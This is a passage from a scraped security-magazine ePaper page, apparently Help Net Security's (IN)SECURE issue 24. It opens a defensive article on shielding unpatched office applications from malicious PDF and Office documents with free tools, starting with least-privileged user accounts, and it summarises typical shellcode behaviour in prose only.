download issue 24 here - Help Net Security
download issue 24 here - Help Net Security
download issue 24 here - Help Net Security
Create successful ePaper yourself
Turn your PDF publications into a flip-book with our unique Google optimized e-Paper software.
Office applications (Adobe Reader, Microsoft Office, etc.) are being actively<br />
targeted by malware authors. Malicious documents “in the wild” that try to infect<br />
your machine by exploiting vulnerabilities in the office applications<br />
abound. For more than a year now, PDF files targeting Adobe Reader have<br />
been quite popular with malware authors.<br />
I assume that you need to use vulnerable office<br />
applications on your business computer,<br />
and that applying patches to fix vulnerabilities<br />
is not always possible, or that it requires leaving<br />
your machines unprotected for a time. I<br />
also assume that using alternative office applications<br />
to change the attack surface is not<br />
an option for your business.<br />
The techniques featured <strong>here</strong> help to protect<br />
you from malware that targets the general<br />
Internet population. These techniques are not<br />
appropriate to protect you from targeted attacks.<br />
In a targeted attack, the malware author<br />
has information about his target that allows<br />
him to design his malware to operate in the<br />
(restricted) environment of his target.<br />
An example of malware used in a targeted attack<br />
is a malicious PDF document designed to<br />
steal confidential documents from a competitor.<br />
I had one important criteria for selecting techniques<br />
to feature in this article: use only free<br />
software.<br />
Least-privileged user account (LUA)<br />
Almost all shellcode I see in malicious documents<br />
(PDF, Word, Powerpoint, …) found “in<br />
the wild” does the following:<br />
1. Download a trojan from the Internet using<br />
HTTP<br />
2. Write the <strong>download</strong>ed executable to<br />
SYSTEM32<br />
3. Execute the <strong>download</strong>ed executable.<br />
www.insecuremag.com 38